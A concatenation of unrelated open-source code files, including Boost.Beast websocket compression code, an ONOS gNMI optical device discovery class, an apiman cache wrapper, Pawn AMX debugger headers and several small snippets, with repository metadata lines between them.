    do_pmd_config(
        http::basic_fields<Allocator> const& h)
    {
        detail::pmd_read(pmd_config_, h);
    }

    // Validate and store local permessage-deflate options.
    // Throws std::invalid_argument on out-of-range values.
    void
    set_option_pmd(permessage_deflate const& o)
    {
        if( o.server_max_window_bits > 15 ||
            o.server_max_window_bits < 9)
            BOOST_THROW_EXCEPTION(std::invalid_argument{
                "invalid server_max_window_bits"});
        if( o.client_max_window_bits > 15 ||
            o.client_max_window_bits < 9)
            BOOST_THROW_EXCEPTION(std::invalid_argument{
                "invalid client_max_window_bits"});
        if( o.compLevel < 0 ||
            o.compLevel > 9)
            BOOST_THROW_EXCEPTION(std::invalid_argument{
                "invalid compLevel"});
        if( o.memLevel < 1 ||
            o.memLevel > 9)
            BOOST_THROW_EXCEPTION(std::invalid_argument{
                "invalid memLevel"});
        pmd_opts_ = o;
    }

    // Copy out the stored local options.
    void
    get_option_pmd(permessage_deflate& o)
    {
        o = pmd_opts_;
    }

    // Add the client's permessage-deflate offer to the upgrade request,
    // if the extension is enabled locally.
    void
    build_request_pmd(http::request<http::empty_body>& req)
    {
        if(pmd_opts_.client_enable)
        {
            detail::pmd_offer config;
            config.accept = true;
            config.server_max_window_bits =
                pmd_opts_.server_max_window_bits;
            config.client_max_window_bits =
                pmd_opts_.client_max_window_bits;
            config.server_no_context_takeover =
                pmd_opts_.server_no_context_takeover;
            config.client_no_context_takeover =
                pmd_opts_.client_no_context_takeover;
            detail::pmd_write(req, config);
        }
    }

    // Allocate and initialize the zlib streams once the extension has
    // been enabled locally and accepted by the peer. Window bits for the
    // inflater/deflater depend on which role we play.
    void
    open_pmd(role_type role)
    {
        if(((role == role_type::client &&
                pmd_opts_.client_enable) ||
            (role == role_type::server &&
                pmd_opts_.server_enable)) &&
            pmd_config_.accept)
        {
            detail::pmd_normalize(pmd_config_);
            pmd_.reset(::new pmd_type);
            if(role == role_type::client)
            {
                pmd_->zi.reset(
                    pmd_config_.server_max_window_bits);
                pmd_->zo.reset(
                    pmd_opts_.compLevel,
                    pmd_config_.client_max_window_bits,
                    pmd_opts_.memLevel,
                    zlib::Strategy::normal);
            }
            else
            {
                pmd_->zi.reset(
                    pmd_config_.client_max_window_bits);
                pmd_->zo.reset(
                    pmd_opts_.compLevel,
                    pmd_config_.server_max_window_bits,
                    pmd_opts_.memLevel,
                    zlib::Strategy::normal);
            }
        }
    }

    // Release the zlib streams.
    void close_pmd()
    {
        pmd_.reset();
    }

    // Whether permessage-deflate was successfully negotiated and opened.
    bool pmd_enabled() const
    {
        return pmd_ != nullptr;
    }

    // Suggest a read buffer size for the next frame, taking the
    // compression state and remaining frame payload into account.
    std::size_t
    read_size_hint_pmd(
        std::size_t initial_size,
        bool rd_done,
        std::uint64_t rd_remain,
        detail::frame_header const& rd_fh) const
    {
        using beast::detail::clamp;
        std::size_t result;
        BOOST_ASSERT(initial_size > 0);
        if(! pmd_ || (! rd_done && ! pmd_->rd_set))
        {
            // current message is uncompressed
            if(rd_done)
            {
                // first message frame
                result = initial_size;
                goto done;
            }
            else if(rd_fh.fin)
            {
                // last message frame
                BOOST_ASSERT(rd_remain > 0);
                result = clamp(rd_remain);
                goto done;
            }
        }
        result = (std::max)(
            initial_size, clamp(rd_remain));
    done:
        BOOST_ASSERT(result != 0);
        return result;
    }
};
//------------------------------------------------------------------------------
template<>
struct impl_base<false>
{
    // These stubs are for avoiding linking in the zlib
    // code when permessage-deflate is not enabled.

    // Without pmd a message can never be deflated.
    bool
    rd_deflated() const
    {
        return false;
    }

    // RSV1 set without pmd negotiated is a protocol violation.
    bool
    rd_deflated(bool rsv1)
    {
        return ! rsv1;
    }

    // No compression: report "no more calls needed" and produce nothing.
    template<class ConstBufferSequence>
    bool
    deflate(
        net::mutable_buffer&,
        buffers_suffix<ConstBufferSequence>&,
        bool,
        std::size_t&,
        error_code&)
    {
        return false;
    }

    void
    do_context_takeover_write(role_type)
    {
    }

    void
    inflate(
        zlib::z_params&,
        zlib::Flush,
        error_code&)
    {
    }

    void
    do_context_takeover_read(role_type)
    {
    }

    // No-op counterpart; definition provided elsewhere.
    template<class Body, class Allocator>
    void
    build_response_pmd(
        http::response<http::string_body>&,
        http::request<Body,
            http::basic_fields<Allocator>> const&);

    void
    on_response_pmd(
        http::response<http::string_body> const&)
    {
    }

    template<class Allocator>
    void
    do_pmd_config(http::basic_fields<Allocator> const&)
    {
    }

    // Enabling the extension is an error in this specialization.
    void
    set_option_pmd(permessage_deflate const& o)
    {
        if(o.client_enable || o.server_enable)
        {
            // Can't enable permessage-deflate
            // when deflateSupported == false.
            //
            BOOST_THROW_EXCEPTION(std::invalid_argument{
                "deflateSupported == false"});
        }
    }

    // Always reports the extension as disabled.
    void
    get_option_pmd(permessage_deflate& o)
    {
        o = {};
        o.client_enable = false;
        o.server_enable = false;
    }

    void
    build_request_pmd(
        http::request<http::empty_body>&)
    {
    }

    void open_pmd(role_type)
    {
    }

    void close_pmd()
    {
    }

    bool pmd_enabled() const
    {
        return false;
    }

    // Same sizing policy as the deflate-enabled version, minus the
    // compression checks.
    std::size_t
    read_size_hint_pmd(
        std::size_t initial_size,
        bool rd_done,
        std::uint64_t rd_remain,
        frame_header const& rd_fh) const
    {
        using beast::detail::clamp;
        std::size_t result;
        BOOST_ASSERT(initial_size > 0);
        // compression is not supported
        if(rd_done)
        {
            // first message frame
            result = initial_size;
        }
        else if(rd_fh.fin)
        {
            // last message frame
            BOOST_ASSERT(rd_remain > 0);
            result = clamp(rd_remain);
        }
        else
        {
            result = (std::max)(
                initial_size, clamp(rd_remain));
        }
        BOOST_ASSERT(result != 0);
        return result;
    }
};
} // detail
} // websocket
} // beast
} // boost
#endif
| 7,267
|
1,011
|
<filename>pySPlisHSPlasH/examples/callbacks.py
import pysplishsplash as sph
def key_callback():
    """ Invoked by the GUI when the key registered below ('k') is pressed. """
    print("Hello World")
def time_step_callback():
    """ Invoked by the simulator once per simulation time step. """
    print("step")
def main():
    """ Run the SPlisHSPlasH simulator with a GUI and demo callbacks. """
    base = sph.Exec.SimulatorBase()
    base.init()
    # attach the imgui-based GUI to the simulator
    gui = sph.GUI.Simulator_GUI_imgui(base)
    base.setGui(gui)
    # fire key_callback whenever 'k' is pressed in the GUI
    gui.addKeyFunc('k', key_callback)
    # fire time_step_callback every simulation step
    base.setTimeStepCB(time_step_callback)
    base.run()
if __name__ == "__main__":
main()
| 170
|
711
|
/*
* Copyright 2015 JBoss Inc
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.apiman.gateway.engine.ispn.io;
import io.apiman.gateway.engine.beans.Api;
import io.apiman.gateway.engine.beans.Client;
import java.io.IOException;
import java.util.Collection;
import java.util.Map;
import java.util.Set;
import org.infinispan.Cache;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.util.ISO8601DateFormat;
/**
* Wraps a cache. Stores serialized versions of the objects
* rather than the objects themselves. This is to avoid
* classloader problems between the Gateway API and the
* Gateway.
*
* @author <EMAIL>
*/
public class RegistryCacheMapWrapper implements Map<String, Object> {

    /** Shared JSON codec used to (de)serialize cached values. */
    private static final ObjectMapper mapper = new ObjectMapper();
    static {
        mapper.setDateFormat(new ISO8601DateFormat());
    }

    /** Key prefix identifying serialized {@link Api} entries. */
    private static final String API_KEY_PREFIX = "API::"; //$NON-NLS-1$
    /** Key prefix identifying serialized {@link Client} entries. */
    private static final String CLIENT_KEY_PREFIX = "CLIENT::"; //$NON-NLS-1$

    private Cache<Object,Object> cache;

    /**
     * Constructor.
     *
     * @param cache the cache
     */
    public RegistryCacheMapWrapper(Cache<Object,Object> cache) {
        this.cache = cache;
    }

    /**
     * @see java.util.Map#size()
     */
    @Override
    public int size() {
        return cache.size();
    }

    /**
     * @see java.util.Map#isEmpty()
     */
    @Override
    public boolean isEmpty() {
        return cache.isEmpty();
    }

    /**
     * @see java.util.Map#containsKey(java.lang.Object)
     */
    @Override
    public boolean containsKey(Object key) {
        return cache.containsKey(key);
    }

    /**
     * Not supported: values are stored serialized, so a value lookup
     * would require deserializing every entry.
     * @see java.util.Map#containsValue(java.lang.Object)
     */
    @Override
    public boolean containsValue(Object value) {
        throw new UnsupportedOperationException();
    }

    /**
     * Returns the cached entry, deserialized from its JSON form.
     * @see java.util.Map#get(java.lang.Object)
     */
    @Override
    public Object get(Object key) {
        return deserialize(key, cache.get(key));
    }

    /**
     * Serializes the value to JSON before storing it in the cache.
     * @see java.util.Map#put(java.lang.Object, java.lang.Object)
     */
    @Override
    public Object put(String key, Object value) {
        try {
            value = mapper.writeValueAsString(value);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
        return cache.put(key, value);
    }

    /**
     * Removes the cached entry, returning it deserialized.
     * @see java.util.Map#remove(java.lang.Object)
     */
    @Override
    public Object remove(Object key) {
        return deserialize(key, cache.remove(key));
    }

    /**
     * @see java.util.Map#putAll(java.util.Map)
     */
    @Override
    public void putAll(Map<? extends String, ? extends Object> m) {
        throw new UnsupportedOperationException();
    }

    /**
     * @see java.util.Map#clear()
     */
    @Override
    public void clear() {
        cache.clear();
    }

    /**
     * @see java.util.Map#keySet()
     */
    @Override
    public Set<String> keySet() {
        throw new UnsupportedOperationException();
    }

    /**
     * @see java.util.Map#values()
     */
    @Override
    public Collection<Object> values() {
        throw new UnsupportedOperationException();
    }

    /**
     * @see java.util.Map#entrySet()
     */
    @Override
    public Set<java.util.Map.Entry<String, Object>> entrySet() {
        throw new UnsupportedOperationException();
    }

    /**
     * Deserializes a cached JSON value according to its key prefix.
     *
     * Fix: previously get() deserialized ANY non-"API::" key as a
     * {@link Client}, while remove() checked for the "CLIENT::" prefix
     * explicitly and returned other values raw. Both paths now share
     * this helper, which only deserializes keys carrying a recognized
     * prefix and passes all other values through untouched.
     *
     * @param key the cache key; its prefix encodes the entity type
     * @param value the raw cached value (a JSON string), may be null
     * @return the deserialized entity, the raw value, or null
     */
    private Object deserialize(Object key, Object value) {
        if (value == null) {
            return null;
        }
        try {
            if (key.toString().startsWith(API_KEY_PREFIX)) {
                return unmarshalAs(value.toString(), Api.class);
            } else if (key.toString().startsWith(CLIENT_KEY_PREFIX)) {
                return unmarshalAs(value.toString(), Client.class);
            }
            return value;
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    /**
     * Unmarshall the given type of object.
     * @param valueAsString the serialized (JSON) form
     * @param asClass the target class
     * @return the deserialized object
     * @throws IOException if deserialization fails
     */
    private <T> T unmarshalAs(String valueAsString, Class<T> asClass) throws IOException {
        return mapper.reader(asClass).readValue(valueAsString);
    }
}
| 2,099
|
335
|
{
"word": "Buff",
"definitions": [
"Polish (something)",
"Give (leather) a velvety finish by removing the surface of the grain.",
"Make (an element in a role-playing or video game) more powerful."
],
"parts-of-speech": "Verb"
}
| 108
|
335
|
<reponame>Safal08/Hacktoberfest-1
{
"word": "Provide",
"definitions": [
"Make available for use; supply.",
"Equip or supply someone with (something useful or necessary)",
"Present or yield (something useful)",
"Make adequate preparation for (a possible event)",
"Supply sufficient money to ensure the maintenance of (someone)",
"(of a law) enable or allow (something to be done)",
"Stipulate in a will or other legal document.",
"Appoint an incumbent to (a benefice)."
],
"parts-of-speech": "Verb"
}
| 213
|
1,144
|
<reponame>bingchunjin/1806_SDK
/*
* ADM5120 specific CPU feature overrides
*
* Copyright (C) 2007-2008 <NAME> <<EMAIL>>
*
* This file was derived from: include/asm-mips/cpu-features.h
* Copyright (C) 2003, 2004 <NAME>
* Copyright (C) 2004 <NAME>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
*/
#ifndef __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H
#define __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H
/*
* The ADM5120 SOC has a built-in MIPS 4Kc core.
*/
#define cpu_has_tlb 1
#define cpu_has_4kex 1
#define cpu_has_3k_cache 0
#define cpu_has_4k_cache 1
#define cpu_has_tx39_cache 0
#define cpu_has_sb1_cache 0
#define cpu_has_fpu 0
#define cpu_has_32fpr 0
#define cpu_has_counter 1
#define cpu_has_watch 1
#define cpu_has_divec 1
/* #define cpu_has_vce ? */
/* #define cpu_has_cache_cdex_p ? */
/* #define cpu_has_cache_cdex_s ? */
#define cpu_has_prefetch 1
/* #define cpu_has_mcheck ? */
#define cpu_has_ejtag 1
#define cpu_has_llsc 1
#define cpu_has_mips16 0
#define cpu_has_mdmx 0
#define cpu_has_mips3d 0
#define cpu_has_smartmips 0
/* #define cpu_has_vtag_icache ? */
/* #define cpu_has_dc_aliases ? */
/* #define cpu_has_ic_fills_f_dc ? */
/* #define cpu_has_pindexed_dcache ? */
/* #define cpu_icache_snoops_remote_store ? */
#define cpu_has_mips32r1 1
#define cpu_has_mips32r2 0
#define cpu_has_mips64r1 0
#define cpu_has_mips64r2 0
#define cpu_has_dsp 0
#define cpu_has_mipsmt 0
/* #define cpu_has_nofpuex ? */
#define cpu_has_64bits 0
#define cpu_has_64bit_zero_reg 0
#define cpu_has_64bit_gp_regs 0
#define cpu_has_64bit_addresses 0
/* #define cpu_has_inclusive_pcaches ? */
#define cpu_dcache_line_size() 16
#define cpu_icache_line_size() 16
#endif /* __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H */
| 866
|
1,987
|
from social_core.backends.username import UsernameAuth
| 13
|
1,091
|
/*
* Copyright 2020-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.drivers.odtn.openconfig;
import com.google.common.collect.HashMultimap;
import com.google.common.collect.Maps;
import com.google.common.collect.Multimap;
import com.google.common.collect.Streams;
import gnmi.Gnmi;
import org.onosproject.drivers.gnmi.OpenConfigGnmiDeviceDescriptionDiscovery;
import org.onosproject.gnmi.api.GnmiUtils.GnmiPathBuilder;
import org.onosproject.net.AnnotationKeys;
import org.onosproject.net.ChannelSpacing;
import org.onosproject.net.DefaultAnnotations;
import org.onosproject.net.Device;
import org.onosproject.net.OchSignal;
import org.onosproject.net.OduSignalType;
import org.onosproject.net.PortNumber;
import org.onosproject.net.device.DefaultDeviceDescription;
import org.onosproject.net.device.DeviceDescription;
import org.onosproject.net.device.PortDescription;
import org.onosproject.net.optical.device.OchPortHelper;
import org.onosproject.odtn.behaviour.OdtnDeviceDescriptionDiscovery;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.ExecutionException;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.onosproject.gnmi.api.GnmiUtils.pathToString;
/**
* A ODTN device discovery behaviour based on gNMI and OpenConfig model.
*
* This behavior is based on the origin gNMI OpenConfig device description discovery
* with additional logic to discover optical ports for this device.
*
* To find all optical port name and info, it queries all components with path:
* /components/component[name=*]
* And it uses components with type "OPTICAL_CHANNEL" to find optical ports
*
*/
public class GnmiTerminalDeviceDiscovery
        extends OpenConfigGnmiDeviceDescriptionDiscovery
        implements OdtnDeviceDescriptionDiscovery {

    private static final Logger log = LoggerFactory.getLogger(GnmiTerminalDeviceDiscovery.class);

    // gNMI path templates, parameterized by component name.
    private static final String COMPONENT_TYPE_PATH_TEMPLATE =
            "/components/component[name=%s]/state/type";
    private static final String LINE_PORT_PATH_TEMPLATE =
            "/components/component[name=%s]/optical-channel/config/line-port";

    /**
     * Reuses the base gNMI discovery but reports the device as a
     * TERMINAL_DEVICE instead of the base class's type.
     */
    @Override
    public DeviceDescription discoverDeviceDetails() {
        return new DefaultDeviceDescription(super.discoverDeviceDetails(),
                Device.Type.TERMINAL_DEVICE);
    }

    /**
     * Discovers both the regular ports (via the base class) and the
     * optical ports, found by querying all components with
     * /components/component[name=*] and converting those of type
     * OPTICAL_CHANNEL into port descriptions.
     */
    @Override
    public List<PortDescription> discoverPortDetails() {
        if (!setupBehaviour("discoverPortDetails()")) {
            return Collections.emptyList();
        }

        // Get all components
        Gnmi.Path path = GnmiPathBuilder.newBuilder()
                .addElem("components")
                .addElem("component").withKeyValue("name", "*")
                .build();

        Gnmi.GetRequest req = Gnmi.GetRequest.newBuilder()
                .addPath(path)
                .setEncoding(Gnmi.Encoding.PROTO)
                .build();
        Gnmi.GetResponse resp;
        try {
            resp = client.get(req).get();
        } catch (ExecutionException | InterruptedException e) {
            log.warn("unable to get components via gNMI: {}", e.getMessage());
            return Collections.emptyList();
        }

        // Group all returned updates by component name so each
        // component can be converted independently.
        Multimap<String, Gnmi.Update> componentUpdates = HashMultimap.create();
        resp.getNotificationList().stream()
                .map(Gnmi.Notification::getUpdateList)
                .flatMap(List::stream)
                .forEach(u -> {
                    // Get component name
                    // /components/component[name=?]
                    Gnmi.Path p = u.getPath();
                    if (p.getElemCount() < 2) {
                        // Invalid path
                        return;
                    }
                    String name = p.getElem(1)
                            .getKeyOrDefault("name", null);

                    // Collect gNMI updates for the component.
                    // name -> a set of gNMI updates
                    if (name != null) {
                        componentUpdates.put(name, u);
                    }
                });

        Stream<PortDescription> normalPorts = super.discoverPortDetails().stream();
        Stream<PortDescription> opticalPorts = componentUpdates.keySet().stream()
                .map(name -> convertComponentToOdtnPortDesc(name, componentUpdates.get(name)))
                .filter(Objects::nonNull);
        return Streams.concat(normalPorts, opticalPorts)
                .collect(Collectors.toList());
    }

    /**
     * Converts gNMI updates to ODTN port description.
     *
     * Paths we expected per optical port component:
     *  - /components/component/state/type
     *  - /components/component/optical-channel/config/line-port
     *
     * @param name component name
     * @param updates gNMI updates
     * @return port description, null if it is not a valid component config/state
     */
    private PortDescription
        convertComponentToOdtnPortDesc(String name, Collection<Gnmi.Update> updates) {
        // Index the updates by their stringified path for easy lookup.
        Map<String, Gnmi.TypedValue> pathValue = Maps.newHashMap();
        updates.forEach(u -> pathValue.put(pathToString(u.getPath()), u.getVal()));

        String componentTypePathStr =
                String.format(COMPONENT_TYPE_PATH_TEMPLATE, name);
        Gnmi.TypedValue componentType =
                pathValue.get(componentTypePathStr);

        if (componentType == null ||
                !componentType.getStringVal().equals("OPTICAL_CHANNEL")) {
            // Ignore the component which is not a optical channel type.
            return null;
        }

        Map<String, String> annotations = Maps.newHashMap();
        annotations.put(OC_NAME, name);
        annotations.put(OC_TYPE, componentType.getStringVal());

        String linePortPathStr =
                String.format(LINE_PORT_PATH_TEMPLATE, name);
        Gnmi.TypedValue linePort = pathValue.get(linePortPathStr);

        // Invalid optical port
        if (linePort == null) {
            return null;
        }

        // According to CassiniTerminalDevice class, we expected to received a string with
        // this format: port-[port id].
        // And we use "port id" from the string as the port number.
        // However, if we can't get port id from line port value, we will use
        // hash number of the port name. (According to TerminalDeviceDiscovery class)
        String linePortString = linePort.getStringVal();
        long portId = name.hashCode();
        if (linePortString.contains("-") && !linePortString.endsWith("-")) {
            try {
                portId = Long.parseUnsignedLong(linePortString.split("-")[1]);
            } catch (NumberFormatException e) {
                log.warn("Invalid line port string: {}, use {}", linePortString, portId);
            }
        }

        annotations.put(AnnotationKeys.PORT_NAME, linePortString);
        annotations.putIfAbsent(PORT_TYPE,
                OdtnDeviceDescriptionDiscovery.OdtnPortType.LINE.value());
        annotations.putIfAbsent(ONOS_PORT_INDEX, Long.toString(portId));
        annotations.putIfAbsent(CONNECTION_ID, "connection-" + portId);

        // NOTE(review): signal fixed to 50GHz DWDM slot 1 — presumably a
        // placeholder until per-channel discovery is implemented; confirm.
        OchSignal signalId = OchSignal.newDwdmSlot(ChannelSpacing.CHL_50GHZ, 1);
        return OchPortHelper.ochPortDescription(
                PortNumber.portNumber(portId, name),
                true,
                OduSignalType.ODU4, // TODO: discover type via gNMI if possible
                true,
                signalId,
                DefaultAnnotations.builder().putAll(annotations).build());
    }
}
| 3,390
|
317
|
#include "smack.h"
#include <assert.h>
#include <stdlib.h>
// @expect error
void foo(int *x) { *x = *x + 10; }
/* SMACK regression test: verifies that a Boogie-level call injected via
 * __SMACK_code is analyzed correctly. foo adds 10 to *y, so the final
 * assertion fails by design (see the "@expect error" marker above). */
int main(void) {
  int *y = malloc(sizeof(int));
  int tmp = __VERIFIER_nondet_int(); /* unconstrained input from the verifier */
  *y = 10;
  // using a dummy unreachable call, force DSA to analyze foo so
  // that __SMACK_code works properly
  assume(tmp == 0);
  if (tmp)
    foo(y);
  /* inject a direct call to foo(y) at the Boogie level; *y becomes 20 */
  __SMACK_code("call foo(@);", y);
  assert(*y == 10);
}
| 173
|
852
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms

# Era modifier flag; its name indicates the Run 2 miniAOD pp-on-AA
# workflow for the 10_3_X release. The Modifier itself carries no
# configuration — downstream configs test for its presence.
run2_miniAOD_pp_on_AA_103X = cms.Modifier()
| 52
|
965
|
<reponame>bobbrow/cpp-docs
// Example: copy a CString into a caller-owned, writable TCHAR buffer.
CString theString(_T("This is a test"));
// +1 for the terminating null, which GetLength() does not count.
int sizeOfString = (theString.GetLength() + 1);
LPTSTR lpsz = new TCHAR[sizeOfString];
// bounded copy into the new buffer (size includes the terminator)
_tcscpy_s(lpsz, sizeOfString, theString);
//... modify lpsz as much as you want
|
303
|
/* Abstract Machine for the Pawn compiler, debugger support
*
* This file contains extra definitions that are convenient for debugger
* support.
*
* Copyright (c) ITB CompuPhase, 2005-2011
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* Version: $Id: amxdbg.h 4523 2011-06-21 15:03:47Z thiadmer $
*/
#ifndef AMXDBG_H_INCLUDED
#define AMXDBG_H_INCLUDED
#ifndef AMX_H_INCLUDED
#include "amx.h"
#endif
#ifdef __cplusplus
extern "C" {
#endif
/* Some compilers do not support the #pragma align, which should be fine. Some
* compilers give a warning on unknown #pragmas, which is not so fine...
*/
#if defined SN_TARGET_PS2 || defined __GNUC__
#define AMX_NO_ALIGN
#endif
#if defined __GNUC__
#define PACKED __attribute__((packed))
#else
#define PACKED
#endif
#if !defined AMX_NO_ALIGN
#if defined __LINUX__ || defined __FreeBSD__
#pragma pack(1) /* structures must be packed (byte-aligned) */
#elif defined MACOS && defined __MWERKS__
#pragma options align=mac68k
#else
#pragma pack(push)
#pragma pack(1) /* structures must be packed (byte-aligned) */
#if defined __TURBOC__
#pragma option -a- /* "pack" pragma for older Borland compilers */
#endif
#endif
#endif
typedef struct tagAMX_DBG_HDR {
int32_t size; /* size of the debug information chunk */
uint16_t magic; /* signature, must be 0xf1ef */
char file_version; /* file format version */
char amx_version; /* required version of the AMX */
int16_t flags; /* currently unused */
int16_t files; /* number of entries in the "file" table */
int16_t lines; /* number of entries in the "line" table */
int16_t symbols; /* number of entries in the "symbol" table */
int16_t tags; /* number of entries in the "tag" table */
int16_t automatons; /* number of entries in the "automaton" table */
int16_t states; /* number of entries in the "state" table */
} PACKED AMX_DBG_HDR;
#define AMX_DBG_MAGIC 0xf1ef
typedef struct tagAMX_DBG_FILE {
uint32_t address; /* address in the code segment where generated code (for this file) starts */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_FILE;
typedef struct tagAMX_DBG_LINE {
uint32_t address; /* address in the code segment where generated code (for this line) starts */
int32_t line; /* line number */
} PACKED AMX_DBG_LINE;
typedef struct tagAMX_DBG_SYMBOL {
uint32_t address; /* address in the data segment or relative to the frame */
int16_t tag; /* tag for the symbol */
uint32_t codestart; /* address in the code segment from which this symbol is valid (in scope) */
uint32_t codeend; /* address in the code segment until which this symbol is valid (in scope) */
char ident; /* kind of symbol (function/variable) */
char vclass; /* class of symbol (global/local) */
int16_t dim; /* number of dimensions */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_SYMBOL;
typedef struct tagAMX_DBG_SYMDIM {
int16_t tag; /* tag for the array dimension */
uint32_t size; /* size of the array dimension */
} PACKED AMX_DBG_SYMDIM;
typedef struct tagAMX_DBG_TAG {
int16_t tag; /* tag id */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_TAG;
typedef struct tagAMX_DBG_MACHINE {
int16_t automaton; /* automaton id */
uint32_t address; /* address of state variable */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_MACHINE;
typedef struct tagAMX_DBG_STATE {
int16_t state; /* state id */
int16_t automaton; /* automaton id */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_STATE;
/* Aggregated debug information for a script; presumably populated by
 * dbg_LoadInfo() and released by dbg_FreeInfo() (see prototypes below).
 * Table lengths are given by the corresponding counts in AMX_DBG_HDR. */
typedef struct tagAMX_DBG {
  AMX_DBG_HDR     *hdr;         /* points to the AMX_DBG header */
  AMX_DBG_FILE   **filetbl;     /* source file table (hdr->files entries) */
  AMX_DBG_LINE    *linetbl;     /* line table (hdr->lines entries) */
  AMX_DBG_SYMBOL **symboltbl;   /* symbol table (hdr->symbols entries) */
  AMX_DBG_TAG    **tagtbl;      /* tag table (hdr->tags entries) */
  AMX_DBG_MACHINE **automatontbl; /* automaton table (hdr->automatons entries) */
  AMX_DBG_STATE  **statetbl;    /* state table (hdr->states entries) */
} PACKED AMX_DBG;
#if !defined iVARIABLE
#define iVARIABLE 1 /* cell that has an address and that can be fetched directly (lvalue) */
#define iREFERENCE 2 /* iVARIABLE, but must be dereferenced */
#define iARRAY 3
#define iREFARRAY 4 /* an array passed by reference (i.e. a pointer) */
#define iFUNCTN 9
#endif
int AMXAPI dbg_FreeInfo(AMX_DBG *amxdbg);
int AMXAPI dbg_LoadInfo(AMX_DBG *amxdbg, FILE *fp);
int AMXAPI dbg_LinearAddress(AMX *amx, ucell relative_addr, ucell *linear_addr);
int AMXAPI dbg_LookupFile(AMX_DBG *amxdbg, ucell address, const char **filename);
int AMXAPI dbg_LookupFunction(AMX_DBG *amxdbg, ucell address, const char **funcname);
int AMXAPI dbg_LookupLine(AMX_DBG *amxdbg, ucell address, long *line);
int AMXAPI dbg_GetFunctionAddress(AMX_DBG *amxdbg, const char *funcname, const char *filename, ucell *address);
int AMXAPI dbg_GetLineAddress(AMX_DBG *amxdbg, long line, const char *filename, ucell *address);
int AMXAPI dbg_GetAutomatonName(AMX_DBG *amxdbg, int automaton, const char **name);
int AMXAPI dbg_GetStateName(AMX_DBG *amxdbg, int state, const char **name);
int AMXAPI dbg_GetTagName(AMX_DBG *amxdbg, int tag, const char **name);
int AMXAPI dbg_GetVariable(AMX_DBG *amxdbg, const char *symname, ucell scopeaddr, const AMX_DBG_SYMBOL **sym);
int AMXAPI dbg_GetArrayDim(AMX_DBG *amxdbg, const AMX_DBG_SYMBOL *sym, const AMX_DBG_SYMDIM **symdim);
#if !defined AMX_NO_ALIGN
#if defined __LINUX__ || defined __FreeBSD__
#pragma pack() /* reset default packing */
#elif defined MACOS && defined __MWERKS__
#pragma options align=reset
#else
#pragma pack(pop) /* reset previous packing */
#endif
#endif
#ifdef __cplusplus
}
#endif
#endif /* AMXDBG_H_INCLUDED */
| 2,624
|
580
|
// https://leetcode.com/problems/running-sum-of-1d-array/submissions/
// https://leetcode.com/problems/running-sum-of-1d-array/submissions/
class Solution {
public:
    // Return the running (prefix) sum of `nums`:
    //   result[i] == nums[0] + nums[1] + ... + nums[i]
    //
    // Fix: the original re-summed the whole prefix for every index
    // (O(n^2)); this is a single O(n) pass that extends one running
    // total. An empty input yields an empty result, and the first
    // element no longer needs special-casing.
    vector<int> runningSum(vector<int>& nums) {
        vector<int> sums;
        sums.reserve(nums.size());  // avoid reallocations
        int total = 0;
        for (int value : nums) {
            total += value;         // extend the prefix sum
            sums.push_back(total);
        }
        return sums;
    }
};
| 340
|
1,178
|
<reponame>leozz37/makani<gh_stars>1000+
/* Hash Table Helper for Trees
   Copyright (C) 2012-2014 Free Software Foundation, Inc.
   Contributed by <NAME> <<EMAIL>>
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3, or (at your option)
any later version.
GCC is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3.  If not see
<http://www.gnu.org/licenses/>.  */
#ifndef GCC_TREE_HASHER_H
#define GCC_TREE_HASHER_H 1
#include "hash-table.h"
/* Maps an integer UID to a tree node.  */
struct int_tree_map {
  unsigned int uid;  /* hash key */
  tree to;           /* associated tree */
};
/* Hashtable helpers.  */
struct int_tree_hasher : typed_free_remove <int_tree_map>
{
  typedef int_tree_map value_type;
  typedef int_tree_map compare_type;
  static inline hashval_t hash (const value_type *);
  static inline bool equal (const value_type *, const compare_type *);
};
/* Hash a UID in a int_tree_map.  The UID itself is the hash value.  */
inline hashval_t
int_tree_hasher::hash (const value_type *item)
{
